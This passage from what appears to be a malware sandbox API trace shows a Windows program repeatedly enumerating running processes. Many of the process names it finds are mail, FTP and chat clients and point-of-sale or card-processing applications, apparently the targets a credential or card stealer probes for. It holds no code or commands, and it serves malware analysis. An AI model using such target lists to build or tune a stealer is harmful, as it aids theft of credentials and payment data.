pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.693] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.695] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.697] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.701] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.703] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.705] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.707] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.709] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.712] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.715] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.717] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.719] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.721] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.723] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.725] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.727] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.922] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0263.204] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0263.206] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0263.208] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0263.211] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0263.213] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0263.258] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0263.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0263.274] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0263.385] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0263.388] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0263.390] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0263.392] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0263.395] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0263.397] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0263.399] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0263.402] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0263.404] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.406] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0263.411] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0263.413] CloseHandle (hObject=0x1d14) returned 1 [0263.413] Sleep (dwMilliseconds=0x64) [0263.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0263.753] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.755] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.757] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.759] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.763] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.765] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.767] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.769] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.771] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.773] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.776] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.984] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.986] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.988] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0263.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0263.999] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0264.002] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0264.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0264.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0264.008] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0264.010] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0264.100] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0264.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.104] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.110] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.112] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0264.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0264.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0264.117] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0264.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0264.120] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0264.124] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0264.126] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0264.128] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0264.129] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0264.131] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0264.132] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0264.134] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0264.135] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 